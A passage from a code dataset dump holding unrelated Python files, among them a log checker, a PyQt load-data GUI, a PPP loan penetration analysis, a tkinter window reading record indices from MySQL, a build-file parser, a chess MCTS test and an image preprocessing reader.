-*-\n\ndef check_len(path,times=0): 
# path is the absolute path of the log file (remember the raw-string r prefix); times is how many entries to sample per error type, show all when omitted\n from pprint import pprint\n import re\n import random\n f = open(path, \"r\", encoding='utf-8')\n lines = f.readlines() # read the whole file and return it as a list of lines\n wrong_dic = {}\n i=1\n for line in lines:\n wrong = re.findall(r\"#(.*?)#[{]\", line)[0]\n #print(wrong)\n wrong = '#' + wrong + '#'\n wrong_type_list = re.findall(r\"#(.*?):\", wrong)\n wrong_title = re.findall(r'\"公告标题\": (.*?),',line)[0]\n second_list = [0, []]\n # i+=1\n # print(i)\n # print(wrong_type_list)\n if '跳转前网页' in line:\n wrong_url = re.findall(r'\"跳转前网页\": (.*?),', line)[0]\n else:\n wrong_url = re.findall(r'\"origin_url\": (.*?),', line)[0]\n small_dic = {wrong_title: wrong_url}\n for wrong_type in wrong_type_list:\n if wrong_type in wrong_dic.keys():\n wrong_dic[wrong_type][0] += 1\n wrong_dic[wrong_type][1].append(small_dic)\n else:\n second_list[0]=i\n second_list[1].append(small_dic)\n wrong_dic.update({wrong_type:second_list})\n for wrong_type in wrong_dic.keys():\n if times ==0:\n pass\n elif len(wrong_dic[wrong_type][1]) > 6:\n i=0\n test_list =[]\n while i < times:\n i+=1\n test_list.append(random.choice(wrong_dic[wrong_type][1]))\n wrong_dic[wrong_type][1] = test_list\n\n pprint(wrong_dic)\n\n\nif __name__ == '__main__':\n #path = r'D:\\迅雷下载\\company_info_extrator\\log_files\\2021-01-08\\Waring_ContentLenMoreThan100.log'\n #path = r'D:\\work\\company_info_extrator\\log_files\\2021-01-11\\Waring_WeiZhiKeyWords.log'\n path = r'D:\\work\\company_info_extrator\\log_files\\2021-01-11\\Waring_ContentLenMoreThan100.log'\n times = 6\n check_len(path,times) # path is the absolute path of the log file (remember the r prefix); times is how many entries to sample per error type, 0 shows everything\n","repo_name":"limtless/limitless","sub_path":"tools/check_waring_len.py","file_name":"check_waring_len.py","file_ext":"py","file_size_in_byte":2154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43104413327","text":"import json\nfrom pathlib import Path\n\nfrom tree_sitter import Language\n\n\nclass QueriedLanguage(Language):\n \"\"\"\n Wrapper class for tree-sitter Language class. 
Uses prepared queries\n to make some operations more convenient\n \"\"\"\n def __init__(self, library_path: str, name: str, queries_path: Path):\n \"\"\"\n Inits tree-sitter Language object with additional capture_query method that allows\n using prepared queries\n\n :param library_path: path to the tree-sitter library object\n :param name: programming language that should be parsed\n :param queries_path: path to the tree-sitter queries folder\n \"\"\"\n super().__init__(library_path, name)\n\n with (queries_path / f\"{name}_queries.json\").open(\"r\") as fr:\n queries = json.load(fr)\n self.query_types = {q_type: self.query(q_text) for q_type, q_text in queries.items()}\n\n def capture_query(self, query_type, root_node):\n \"\"\"\n Executes one of prepared query for the root_node of the given tree\n :param query_type: which query to use (check which is available in class)\n :param root_node: root node of parsed code tree\n :return: list of all captures for the query\n \"\"\"\n if query_type not in self.query_types:\n raise ValueError(f\"{query_type} not in prepared queries.\"\n f\"\\nChoose one of {', '.join(self.query_types.keys())}\")\n\n return self.query_types[query_type].captures(root_node)\n","repo_name":"HSE-JetBrains-department/2022_similar_dev_search_arifkhanov","sub_path":"source_code/code_parsing/queried_language.py","file_name":"queried_language.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35286996260","text":"class Teacher:\n def __init__(self, first_name, last_name, students):\n self.first_name = first_name\n self.last_name = last_name\n self.number_of_students = students\n\n def show_information(self):\n print(f'Full name: {self.first_name} {self.last_name}\\n'\n f'Number of students: {self.number_of_students}')\n\n\nclass Mathematics(Teacher):\n def __init__(self, number, *args, **kwargs):\n self.favorite_number = number\n super().__init__(*args, **kwargs)\n\n def show_information(self):\n print(f'Full name: {self.first_name} {self.last_name}\\n'\n f'Number of students: {self.number_of_students}\\n'\n f'Favorite number: {self.favorite_number}')\n\n\nteacher = Teacher('John', 'Gomez', 30)\nteacher.show_information()\n\nprint('------------------------')\n\nmathematics = Mathematics(first_name='Tom', last_name='Smith', students=35, number=10)\nmathematics.show_information()\n","repo_name":"szymcio32/python-object-oriented-programming-course","sub_path":"chapter-3/method_overriding.py","file_name":"method_overriding.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"25410526760","text":"from PyQt4 import QtCore, QtGui\nimport numpy as np\nimport gui.globals as globals\nimport gui.utility as utility\n \nclass loads_ui(QtGui.QWidget): \n \n def setup(self, window): \n \"\"\"Set up and initialise loads tab\"\"\"\n \n self.main_window = window \n \n title1 = QtGui.QLabel('Load variability')\n title1.setFont(QtGui.QFont('arial', weight=QtGui.QFont.Bold))\n \n label1 = QtGui.QLabel('Summer Dispersion:')\n label1.setFixedWidth(100)\n \n self.edit_sigma_s = QtGui.QLineEdit()\n self.edit_sigma_s.setFixedWidth(100)\n \n label2 = QtGui.QLabel('Winter Dispersion:')\n label2.setFixedWidth(100)\n \n self.edit_sigma_w = QtGui.QLineEdit()\n self.edit_sigma_w.setFixedWidth(100)\n \n title2 = QtGui.QLabel('Hourly load data')\n title2.setFont(QtGui.QFont('arial', 
weight=QtGui.QFont.Bold))\n \n headings = ['Summer (kW)', 'Winter (kW)']\n self.tableWidget = SolarTable(window, headings = headings, alternatingRowColors = True)\n self.tableWidget.setMinimumHeight(500)\n vheadings = ['00:00', '01:00', '02:00', '03:00', '04:00', '05:00', '06:00', '07:00', '08:00', '09:00', '10:00', '11:00', '12:00', '13:00', '14:00', '15:00', '16:00', '17:00', '18:00', '19:00', '20:00', '21:00', '22:00', '23:00']\n self.tableWidget.setRowCount(len(vheadings)) \n self.tableWidget.setVerticalHeaderLabels(vheadings)\n \n layout = QtGui.QGridLayout()\n layout.addWidget(title1, 0, 0)\n layout.addWidget(label1, 1, 0)\n layout.addWidget(self.edit_sigma_s, 1, 1)\n layout.addWidget(label2, 2, 0)\n layout.addWidget(self.edit_sigma_w, 2, 1)\n layout.addWidget(title2, 3, 0, 1, 2)\n layout.addWidget(self.tableWidget, 4, 0, 10, 3)\n self.setLayout(layout)\n\n self.edit_sigma_s.editingFinished.connect(utility.create_validation_hook(self, self.edit_sigma_s, \"Summer dispersion\", 0, 99999))\n \n self.edit_sigma_w.editingFinished.connect(utility.create_validation_hook(self, self.edit_sigma_w, \"Winter dispersion\", 0, 99999))\n \n self.tableWidget.itemChanged.connect(self.update_data_matrix)\n\n self.refresh_data() \n \n def update_data(self):\n \"\"\"Update global variables to match GUI fields\"\"\"\n globals.load_sigma[0] = float(self.edit_sigma_s.text())\n globals.load_sigma[1] = float(self.edit_sigma_w.text())\n \n def update_data_matrix(self, tableWidgetItem): \n \"\"\"Update load matrix whenever table data is changed\"\"\"\n value = 0.0\n if tableWidgetItem.column() == 0:\n element = \"Summer Load\"\n lower_bound = 0.0\n upper_bound = 999999\n value = utility.validate(tableWidgetItem.text(), lower_bound, upper_bound, l_inclusive = True, u_inclusive = False)\n elif tableWidgetItem.column() == 1:\n element = \"Winter Load\"\n lower_bound = 0.0\n upper_bound = 999999\n value = utility.validate(tableWidgetItem.text(), lower_bound, upper_bound, l_inclusive = True, u_inclusive = False)\n \n if value is not False: \n columns = [0,1] \n column = columns[tableWidgetItem.column()]\n update_mapping = (globals.loads[tableWidgetItem.row(), column] != value) \n globals.loads[tableWidgetItem.row(), column] = value\n #tableWidgetItem.setText(str(value))\n \n else:\n self.main_window.show_status_message(element + \" Hour \" + str(tableWidgetItem.row()) + \": Input value '\" + tableWidgetItem.text() + \"' out of bounds. (\" + str(lower_bound) + \" to \" + str(upper_bound) + \"). 
Value not set.\", error = True, beep = True)\n self.tableWidget.itemChanged.disconnect()\n self.refresh_data() \n self.tableWidget.itemChanged.connect(self.update_data_matrix) \n \n def refresh_data(self):\n \"\"\"Update GUI fields to match global variables\"\"\"\n self.edit_sigma_s.setText(str(globals.load_sigma[0]))\n self.edit_sigma_w.setText(str(globals.load_sigma[1]))\n self.tableWidget.fill_table(globals.loads)\n \nclass SolarTable(utility.CentaurTable): \n \"\"\"Modified version of LowFi table specifically for the Right Of Way tab.\"\"\"\n\n def signal_mapping(signal_mapper):\n self.signal_mapper = signal_mapper\n\n def fill_table(self, data):\n \"\"\"Fill table from 2D list or numpy array.\"\"\"\n if len(data) > 0:\n if isinstance(data, np.ndarray):\n data = data.tolist()\n data_rows = len(data)\n data_columns = len(data[0])\n \n if data_columns > 0:\n self.setRowCount(data_rows)\n for r in range(0, data_rows):\n # Update real columns\n for c in range(2):\n item = QtGui.QTableWidgetItem() \n item.setText(str(data[r][c])) \n self.setItem(r, c, item)","repo_name":"Tivieta/CENTAUR","sub_path":"gui/gui_loads.py","file_name":"gui_loads.py","file_ext":"py","file_size_in_byte":5180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18690952489","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 20 13:23:36 2020\nv2 version of this script was to work with BLS QCEW data\nv3 version is to work \n@author: aligo\n\"\"\"\n\nimport loans_common as co\n\nimport pandas as pd\nimport zipfile\nfrom plotnine import * # python lib to use ggplot\nfrom io import BytesIO\nfrom urllib.request import urlopen\n\nnaics = 'NAICS2'\nexcsole = False\n\nloans = co.ReadPPPdata(naics)\n\n# Number of loans per county and NAICS2\n[loans_y, countyfips] = co.MatchCounties(loans, excsole, naics)\n\n# EXECUTE THIS COMMAND ONLY AFTER CHECKING THE EXCEL FILE OF UNMATCHED LOANS in Downloads/\nloansum = co.AddManualCounties(loans_y, excsole, naics)\n\n# TOTAL NUMBER OF BUSINESSES - from US Census CBP\nurl = urlopen(\"https://www2.census.gov/programs-surveys/cbp/datasets/2018/cbp18co.zip\")\n#Download Zipfile and create pandas DataFrame\nzipfile = zipfile.ZipFile(BytesIO(url.read()))\ncbp = pd.read_csv(zipfile.open('cbp18co.txt'), na_values='N')\n\ncbp['FIPST'] = cbp['fipstate'].astype(str).str.pad(2,fillchar='0')\ncbp['area_fips'] = cbp['FIPST'] + cbp['fipscty'].astype(str).str.pad(3,fillchar='0')\ncnt = cbp[cbp['FIPST'].isin(co.NEstfips) # New England counties\n & ~cbp['fipscty'].eq(999) # exclude fipscty = 999 that are \"statewide\" totals\n & cbp['naics'].str.contains('^[0-9][0-9]----',regex=True)] # 2-digit NAICS codes\ncnt = cnt.assign( industry_code = cnt['naics'].str.slice(start=0,stop=2) ) # 2-digit NAICS codes, cleaned\ncnt['NEstabs'] = cnt[['n<5','n5_9','n10_19','n20_49','n50_99','n100_249','n250_499']\n ].sum(axis=1, skipna=True) # num Establishments with < 500 employees\ncnt = cnt[['area_fips','industry_code','NEstabs']].set_index('area_fips')\n# Add state and county name\ncnt = cnt.join(countyfips.set_index('COUNTY'))\n\n# Join Total Num businesses + Num of loans\ncnt = cnt.reset_index()\ncnt.columns = ['COUNTYfips','NAICS2','NEstabs','State','COUNTYName']\n# adjusts 2-digit NAICS that are joint, e.g. 
NAICS 31-33 Manufacturing\ncnt = co.OverrideNAICS2(cnt)\n\npen = co.CalcPenetration(loansum, cnt, naics)\n\n# total per county \ndfc = pen.groupby(['COUNTYName']).agg('sum').reset_index()\ndfc['penetration'] = dfc['NLoans'] / dfc['NEstabs']\nggplot(dfc, aes(x='reorder(COUNTYName,penetration)', y='penetration')\n ) + geom_bar(stat=\"identity\"\n ) + xlab('County'\n ) + ylab('PPP Loan Penetration'\n ) + ggtitle('New England PPP Penetrations per County'\n ) + theme(axis_text_y = element_text(size=6)\n ) + coord_flip()\n\n# total per NAICS\ndfp = pen.groupby(['NAICS2','NAICSdescr']).agg('sum').reset_index()\ndfp['penetration'] = dfp['NLoans'] / dfp['NEstabs']\n\nggplot(dfp, aes(x='reorder(NAICSdescr,penetration)', y='penetration')\n ) + geom_bar(stat=\"identity\"\n ) + xlab('NAICS 2 Digit Sector'\n ) + ylab('PPP Loan Penetration'\n ) + ggtitle('New England PPP Penetrations per NAICS Sector'\n# ) + scale_y_continuous(trans = 'log2'\n ) + coord_flip()\n\n# Histogram of County-NAICS penetrations\nggplot(pen[pen.penetration.le(1)], aes(x='penetration')\n ) + geom_histogram(binwidth=.05\n ) + xlab('PPP Loan Penetration'\n ) + ylab('Number of Counties-Sectors'\n ) + ggtitle('Distribution of PPP Penetration <= 1 in New England')\n\n# outlier penetrations\nggplot(pen, aes(x='State', y='penetration')\n ) + geom_boxplot(\n ) + xlab('State'\n ) + ylab('Penetration'\n ) + ggtitle('Outliers of PPP Penetration in New England')\n\n\n\n\n\n","repo_name":"alexandrekl/fema_r1","sub_path":"loans_CBP.py","file_name":"loans_CBP.py","file_ext":"py","file_size_in_byte":3552,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20120639172","text":"import sys\n\nsys.path.append(\"../ariadna\")\nimport mysql.connector\nimport pandas as pd\nimport tkinter as tk\nfrom tkinter.font import Font\nfrom .ventana_base import VentanaBase\n\n\nclass VentanaIndices(tk.Toplevel, VentanaBase):\n def __init__(self, ventana, indices):\n super().__init__(ventana)\n self.title(\"Setear índices\")\n self.ancho = 360\n self.alto = 300\n self.geometry(self.centrar_ventana(ventana, self.ancho, self.alto))\n self.configure(bg=self.color_back)\n self.crear_widgets(indices)\n\n def crear_widgets(self, indices):\n etiquetas = [\n \"Hechos\",\n \"Calificaciones\",\n \"Armas\",\n \"Automotores\",\n \"Objetos\",\n \"Secuestros\",\n \"Involucrados\",\n ]\n\n sep_x = 30\n sep_y = 0.5\n font_label = Font(weight=\"bold\", size=9)\n self.etiquetas_labels = []\n self.etiquetas_entries = []\n\n for i, etiqueta_texto in enumerate(etiquetas):\n etiqueta = tk.Label(\n self,\n text=etiqueta_texto,\n font=font_label,\n fg=\"white\",\n bg=self.color_back,\n )\n etiqueta.place(x=70, y=(i + sep_y) * sep_x, anchor=tk.NW)\n self.etiquetas_labels.append(etiqueta)\n\n cuadro_texto = tk.Entry(\n self,\n textvariable=indices[i],\n )\n cuadro_texto.place(x=160, y=(i + sep_y) * sep_x, anchor=tk.NW)\n self.etiquetas_entries.append(cuadro_texto)\n\n btn_base = tk.Button(\n self,\n text=\"Desde la Base\",\n bg=\"orange\",\n command=lambda: self.conectar_con_base(),\n )\n btn_base.place(x=155, y=250)\n\n btn_archivo = tk.Button(\n self,\n text=\"Desde archivo\",\n bg=\"sky blue\",\n command=lambda: self.conectar_con_archivo(),\n )\n btn_archivo.place(x=40, y=250)\n\n btn_setear_ids = tk.Button(\n self,\n text=\"Setear IDs\",\n bg=\"light green\",\n command=lambda: self.actualizar_indices(indices, self.etiquetas_entries),\n )\n btn_setear_ids.place(x=270, y=250)\n\n def actualizar_indices(self, indices, entries):\n 
for i, ind in enumerate(indices):\n ind.set(entries[i].get())\n self.mostrar_mensaje_info(\"Los índices fueron configurados correctamente\")\n self.destroy()\n\n def conectar_con_base(self):\n try:\n indices = []\n\n try:\n conexion = mysql.connector.connect(\n host=\"192.168.1.135\",\n port=\"3307\",\n user=\"simon\",\n password=\"monitoreo\",\n database=\"delitos_2023\",\n )\n except Exception as error:\n print(error)\n # Crear un cursor para ejecutar consultas\n cursor = conexion.cursor()\n\n consulta = \"SELECT max(id_hecho) FROM datos_hecho\"\n cursor.execute(consulta)\n resultados = cursor.fetchall()\n for fila in resultados:\n indices.append(fila[0])\n\n indices.append(0)\n\n consulta = \"SELECT max(id) FROM armas\"\n cursor.execute(consulta)\n resultados = cursor.fetchall()\n for fila in resultados:\n indices.append(fila[0])\n\n consulta = \"SELECT max(id) FROM automotores\"\n cursor.execute(consulta)\n resultados = cursor.fetchall()\n for fila in resultados:\n indices.append(fila[0])\n\n consulta = \"SELECT max(id) FROM objetos\"\n cursor.execute(consulta)\n resultados = cursor.fetchall()\n for fila in resultados:\n indices.append(fila[0])\n\n consulta = \"SELECT max(id) FROM secuestros\"\n cursor.execute(consulta)\n resultados = cursor.fetchall()\n for fila in resultados:\n indices.append(fila[0])\n\n consulta = \"SELECT max(id) FROM involucrados\"\n cursor.execute(consulta)\n resultados = cursor.fetchall()\n for fila in resultados:\n indices.append(fila[0])\n\n # Cerrar el cursor y la conexión\n cursor.close()\n conexion.close()\n\n for i, ind in enumerate(indices):\n self.etiquetas_entries[i].delete(0, \"end\")\n self.etiquetas_entries[i].insert(0, ind + 1)\n\n except Exception as error:\n self.mostrar_mensaje_error(error)\n\n def conectar_con_archivo(self):\n ruta_archivo = self.seleccionar_archivo(\"/Exportaciones/Segmentados/\")\n try:\n # Cargar el archivo Excel\n df = pd.read_excel(ruta_archivo, sheet_name=None)\n\n # Lista para almacenar los últimos registros\n ultimos_registros = []\n\n # Iterar sobre cada hoja del archivo\n for hoja, datos in df.items():\n # Obtener el último valor de la primera columna\n try:\n ultimo_registro = datos.iloc[-1, 0]\n ultimos_registros.append(ultimo_registro)\n except Exception:\n raise ValueError(\n \"\"\"Una de las tablas se encuentra vacía y no fue posible\n recuperar ningún índice. 
Por favor, setea los índices a través de la base\"\"\"\n )\n\n for i, ind in enumerate(ultimos_registros):\n self.etiquetas_entries[i].delete(0, \"end\")\n self.etiquetas_entries[i].insert(0, ind + 1)\n\n except FileNotFoundError:\n self.mostrar_mensaje_info(\"No se ha seleccionado ningún archivo\")\n","repo_name":"simon1494/Ariadna","sub_path":"vista/ventana_indices.py","file_name":"ventana_indices.py","file_ext":"py","file_size_in_byte":5872,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11125593840","text":"import re\n\nfrom build_model import BuildSpec, BuildException\nfrom config import PROJ_EXT, PACKAGE_EXT, COMP_EXT, CONFIG_EXT, OPTION_EXT\nfrom project_vars import *\nfrom projects import MultiVariable, PRIVATE_SUFFIX\n\nSCOPE_EXPORT = 'export'\n\n# zero-width joiner, indicates where lines were merged via '\\'\nZWJ = u'\\u200d'\n\ndef parse_list(s):\n \"\"\"\n Parse a string as a space-separated list of items,\n accounting for quoting.\n :param s:\n :return: list of items\n \"\"\"\n in_quote = False\n keep_quotes = False\n items = []\n item = ''\n\n for ch in s:\n if in_quote:\n if ch == '\"':\n in_quote = False\n if not keep_quotes:\n continue\n else:\n keep_quotes = False\n item += ch\n else:\n if ch == '\"':\n in_quote = True\n if item:\n keep_quotes = True\n else:\n keep_quotes = False\n continue\n if ch == ' ' or ch == '\\t':\n if item:\n items.append(item)\n item = ''\n continue\n if ch == '#':\n # comment\n break\n item += ch\n\n if item:\n items.append(item)\n\n return items\n\n\n# a line is a definition, with scope, optional specs and commas, followed by a comment, either, or none\nLINE = re.compile(r'\\s*(?:(?P[a-zA-Z]+)\\s+)?((?P([A-Za-z_-][A-Za-z0-9_.,-]*))\\s*=\\s*(?P.*?)\\s*)?$')\n\nEMBEDDED_COMMENTS = re.compile(r'#.*?\\u200d')\n\n# make the spec representing \"all\"\nALL_SPEC = BuildSpec('', no_defaults=True)\n# the spec representing \"default\"\nDEFAULT_SPEC = None\n\n\ndef parse_vars(fp, ext, label, errors, warnings):\n \"\"\"\n Parse content from the filelike @fp and return a map\n of variable names to MultiVariable.\n :param fp: filelike for text\n :type fp: file\n :param ext: the file extension\n :param label: label for errant lines (e.g. filename)\n :param errors: updated list of errors\n :param warnings: updated list of warnings\n :rtype: Dict[str, MultiVariable]\n \"\"\"\n num = 0\n\n # variable mappings as MultiVariables\n vars = {}\n # :type: Dict[str, MultiVariable]\n\n def line_error(text):\n errors.append((label, num, text))\n\n def line_warn(text):\n warnings.append((label, num, text))\n\n def process(line):\n \"\"\"\n :type line: str\n \"\"\"\n # replace comments with a space, and strip\n if '#' in line and ZWJ in line:\n line = EMBEDDED_COMMENTS.sub(' ', line)\n line = line.replace(ZWJ, ' ').strip()\n if not line or line.startswith('#'):\n return\n\n # debug(\"checking line: \" + line)\n\n # all lines should be simple assignments\n match = LINE.match(line)\n if not match:\n line_error(\"unexpected syntax in line\")\n return\n\n # validate the LHS\n var_spec = match.group('id')\n if not var_spec:\n return # comment\n\n # rename deprecated settings\n var_spec = var_spec.replace(SIGNER, MLCERT)\n\n if '.' 
in var_spec:\n idx = var_spec.index('.')\n var = var_spec[0:idx]\n specs_str = var_spec[idx + 1:]\n\n if specs_str == 'default':\n specs = [DEFAULT_SPEC]\n else:\n specs = specs_str.split(',')\n for spec in specs:\n if not spec:\n line_error(\"Unexpected empty specialization in '{0}'\".format(var_spec))\n\n if var in UNSPECIALIZABLE_VARS:\n line_error(\"setting cannot be specialized in '{0}'\".format(var_spec))\n\n else:\n var = var_spec\n specs = [ALL_SPEC]\n\n if var not in ALL_VARS:\n line_warn(\"unrecognized project setting '{0}'\".format(var))\n\n # make sure the variables match the project type (which will be\n # lost shortly afterward because the options/configs/etc. are\n # merged in)\n scope = match.group('scope')\n suffix = PRIVATE_SUFFIX if ext == PROJ_EXT else ''\n if scope:\n if scope != SCOPE_EXPORT:\n line_error(\"unexpected scope (only 'export' known): '{0}'\".format(scope))\n elif var in ALWAYS_EXPORTED_VARS:\n line_warn(\"this setting is always exported: '{0}'\".format(var))\n elif var not in PROJ_EXPORTS and var in ALL_VARS:\n line_error(\"cannot export this setting: '{0}'\".format(var))\n else:\n if ext != PROJ_EXT:\n if ext == PACKAGE_EXT:\n line_warn(\"'export' is meaningless in a package, for: '{0}'\".format(var))\n else:\n line_warn(\"'export' is redundant; all settings are exported: '{0}'\".format(var))\n suffix = ''\n else:\n if var in ALWAYS_EXPORTED_VARS:\n suffix = ''\n\n var_scoped = var + suffix\n\n # convert value to a list\n try:\n value = parse_list(match.group('value'))\n except Exception as e:\n line_error(e.message)\n\n mv = vars.setdefault(var_scoped, MultiVariable())\n\n for spec in specs:\n try:\n exist = mv.set(spec, value)\n\n if exist:\n line_error(\"redefining setting '{0}'\".format(var_spec))\n except BuildException as e:\n line_error(str(e))\n\n num = 0\n curline = ''\n for line in fp.readlines():\n line = line.strip()\n curline += line\n num += 1\n\n if line.endswith('\\\\'):\n # continuation\n curline = curline[:-1] + ZWJ\n continue\n\n process(curline)\n curline = ''\n\n process(curline)\n\n return vars\n","repo_name":"jfwallin/magicClassroom","sub_path":"common/mlsdk/v0.23.0/tools/mabu/src/project_parser.py","file_name":"project_parser.py","file_ext":"py","file_size_in_byte":5916,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38200562198","text":"from MctsNode import MctsNode\r\nfrom StockfishEvalRolloutMcts import StockfishEvalRolloutMcts\r\nfrom StokfishRolloutMcts import StockfishRolloutMctsNode\r\nimport random\r\nfrom multiprocessing import Pool\r\nimport chess\r\nimport time\r\n\r\n\r\ndef explore_tree(root, node_class):\r\n exec_time = []\r\n for _ in range(400):\r\n start = time.time()\r\n node = root.explore()\r\n if node.N != 0:\r\n node.add_children(node_class)\r\n node = random.choice(list(node.children.values()))\r\n reward = node.rollout()\r\n node.backpropagation(reward)\r\n exec_time.append(time.time()-start)\r\n print(f\"Medium time for every iteration: {sum(exec_time)/len(exec_time)}\")\r\n return root\r\n\r\n\r\ndef find_best_node(node):\r\n children = node.children\r\n max_key = max(children.items(), key=lambda item: (item[1].N, item[1].T))[0]\r\n max_key_relative = max(children.items(), key=lambda item: (item[1].T/item[1].N))[0]\r\n print(children[max_key].move)\r\n print(children[max_key_relative].move)\r\n return children[max_key]\r\n\r\n\r\nif __name__ == \"__main__\":\r\n node_class = StockfishRolloutMctsNode\r\n board = chess.Board()\r\n root1 = 
node_class(board)\r\n root2 = node_class(board)\r\n root3 = node_class(board)\r\n root4 = node_class(board)\r\n root5 = node_class(board)\r\n root6 = node_class(board)\r\n start_time = time.time()\r\n\r\n with Pool() as pool:\r\n result = pool.starmap(explore_tree, [(root1, node_class), (root2, node_class), (root3, node_class)])#, (root4, node_class), (root5, node_class), (root6, node_class)])\r\n print(f\"Program finished in {time.time() - start_time} seconds\")\r\n final_tree = sum(result[1:], result[0])\r\n best_move = find_best_node(final_tree)\r\n print(\"-------------------------------------------------------------\")\r\n \"\"\"start_time = time.time()\r\n for root in [root1, root2, root3]:\r\n res = explore_tree(root, node_class)\r\n print(f\"Program finished in {time.time() - start_time} seconds\")\r\n start_time = time.time()\r\n res = explore_tree(root3, node_class)\r\n print(f\"Program finished in {time.time() - start_time} seconds\")\"\"\"\r\n print()\r\n","repo_name":"GiovanniGrotto/ChessMCTS","sub_path":"parallel_test.py","file_name":"parallel_test.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72198591208","text":"import os\nimport math\nimport random\nimport functools\nimport numpy as np\nimport paddle\nimport cv2\nfrom PIL import Image, ImageEnhance\n\nrandom.seed(0)\nnp.random.seed(0)\n\nDATA_DIM = 224\n\nBUF_SIZE = 102400\n\n\nmean = [0.485, 0.456, 0.406]\nstd = [0.229, 0.224, 0.225]\n\ndef resize_short(img, target_size):\n percent = float(target_size) / min(img.shape[0], img.shape[1])\n resized_width = int(round(img.shape[1] * percent))\n resized_height = int(round(img.shape[0] * percent))\n img = cv2.resize(img, (resized_width, resized_height))\n return img\n\n\ndef crop_image(img, target_size, center):\n height, width = img.shape[:2]\n size = target_size\n if center == True:\n w_start = (width - size) / 2\n h_start = (height - size) / 2\n else:\n w_start = np.random.randint(0, width - size + 1)\n h_start = np.random.randint(0, height - size + 1)\n w_end = w_start + size\n h_end = h_start + size\n img = img[h_start:h_end, w_start:w_end, :]\n return img\n\n\ndef random_crop(img, size, scale=[0.08, 1.0], ratio=[3. / 4., 4. / 3.]):\n aspect_ratio = math.sqrt(np.random.uniform(*ratio))\n w = 1. * aspect_ratio\n h = 1. 
/ aspect_ratio\n\n bound = min((float(img.size[0]) / img.size[1]) / (w**2),\n (float(img.size[1]) / img.size[0]) / (h**2))\n scale_max = min(scale[1], bound)\n scale_min = min(scale[0], bound)\n\n target_area = img.size[0] * img.size[1] * np.random.uniform(scale_min,\n scale_max)\n target_size = math.sqrt(target_area)\n w = int(target_size * w)\n h = int(target_size * h)\n\n i = np.random.randint(0, img.size[0] - w + 1)\n j = np.random.randint(0, img.size[1] - h + 1)\n\n img = img.crop((i, j, i + w, j + h))\n img = img.resize((size, size), Image.LANCZOS)\n return img\n\n\ndef rotate_image(img):\n angle = np.random.randint(-10, 11)\n img = img.rotate(angle)\n return img\n\n\ndef distort_color(img):\n def random_brightness(img, lower=0.5, upper=1.5):\n e = np.random.uniform(lower, upper)\n return ImageEnhance.Brightness(img).enhance(e)\n\n def random_contrast(img, lower=0.5, upper=1.5):\n e = np.random.uniform(lower, upper)\n return ImageEnhance.Contrast(img).enhance(e)\n\n def random_color(img, lower=0.5, upper=1.5):\n e = np.random.uniform(lower, upper)\n return ImageEnhance.Color(img).enhance(e)\n\n ops = [random_brightness, random_contrast, random_color]\n np.random.shuffle(ops)\n\n img = ops[0](img)\n img = ops[1](img)\n img = ops[2](img)\n\n return img\n\n\ndef process_image(img_path, data_dim=224):\n img = cv2.imread(img_path)\n img = resize_short(img, target_size=data_dim)\n img = crop_image(img, target_size=data_dim, center=True)\n img = img[:, :, ::-1].astype('float32').transpose((2, 0, 1)) / 255\n img_mean = np.array(mean).reshape((3, 1, 1))\n img_std = np.array(std).reshape((3, 1, 1))\n img -= img_mean\n img /= img_std\n with open(os.path.join('a.txt'), 'w') as f:\n for ele in img.flatten():\n f.write(str(ele))\n f.write(\" \")\n return img.flatten()\n\n\n","repo_name":"PaddlePaddle/benchmark","sub_path":"Inference/model/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":3137,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"53"} +{"seq_id":"18508974093","text":"def chisla (a):\n b = ['one','two','three','four','five','six','seven','eight','nine']\n c = ['twenty','thirty','forty','fifty','sixty','seventy','eighty','ninety']\n t = ['eleven','twelve','thirteen','fourteen','fifteen','sixteen','seventeen','eighteen','nineteen']\n f = ''\n if a < 0 or a > 999:\n return 0\n s = len(str(a))\n r = str(a)\n if s == 3:\n f += b[int(r[0])-1] +' '\n f += 'hundred '\n f += c[int(r[1])-2] +' '\n f += b[int(r[2])-1] +' '\n if s == 2:\n if a == 10:\n f = 'ten'\n elif a > 10 and a < 20:\n f = t[int(r[1])-1]\n else:\n f += c[int(r[0])-2] +' '\n f += b[int(r[1])-1] +' '\n if s == 1:\n f += b[int(r[0])-1] +' '\n return f\n \nwhile 1:\n try:\n print(chisla(int(input())))\n except:\n print(':(')\n","repo_name":"Gipegil/test","sub_path":"chisla.py","file_name":"chisla.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9354850230","text":"from pymoo.algorithms.so_genetic_algorithm import GA\nfrom pymoo.factory import get_problem\nfrom pymoo.optimize import minimize\nfrom pymoo.util.termination.constr_violation import ConstraintViolationToleranceTermination\n\nproblem = get_problem(\"g05\")\nalgorithm = GA(pop_size=100)\n\nres = minimize(problem,\n algorithm,\n ConstraintViolationToleranceTermination(),\n return_least_infeasible=True,\n seed=1,\n 
